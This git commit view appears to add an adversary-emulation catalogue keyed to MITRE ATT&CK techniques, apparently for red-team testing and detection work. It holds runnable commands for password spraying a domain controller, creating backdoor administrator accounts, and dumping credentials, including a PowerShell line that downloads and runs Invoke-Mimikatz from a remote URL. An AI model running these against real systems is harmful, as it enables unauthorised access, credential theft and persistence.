Initial Commit

Initial Checkin
2017-10-11 10:35:17 -07:00
commit ac8dd2cfec
61 changed files with 1550 additions and 0 deletions
@@ -0,0 +1,16 @@
+# Brute Force
+
+MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
+
+## net.exe
+
+### Password Spray
+
+
+    net user /domain > DomainUsers.txt
+    echo "Password1" >> pass.txt
+    echo "1q2w3e4r" >> pass.txt
+
+Execute:
+
+    @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
@@ -0,0 +1,35 @@
+# Create Account
+
+MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
+
+## Net.exe
+
+Local user add:
+
+    Net user /add Trevor SmshBgr123
+
+Add new user to localgroup:
+
+    net localgroup administrators jack /add
+
+Domain add:
+
+    net user username \password \domain
+
+Add user to Active Directory:
+
+    dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
+
+# Powershell 5.1
+
+The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
+
+Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
+
+## Add User
+
+    New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account'
+
+## Create a group
+
+    New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
@@ -0,0 +1,36 @@
+# Credential Dumping
+
+MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003)
+
+
+## Powershell Mimikatz
+
+Input:
+
+    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+
+## Gsecdump
+
+[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5)
+
+Input:
+
+    gsecdump -a
+
+## Windows Credential Editor
+
+[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/)
+
+Input:
+
+    wce -o output.txt
+
+Output:
+
+    C:\>wce -o output.txt
+    WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
+    Use -h for help.
+
+    C:\>type output.txt
+    test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
+    C:\>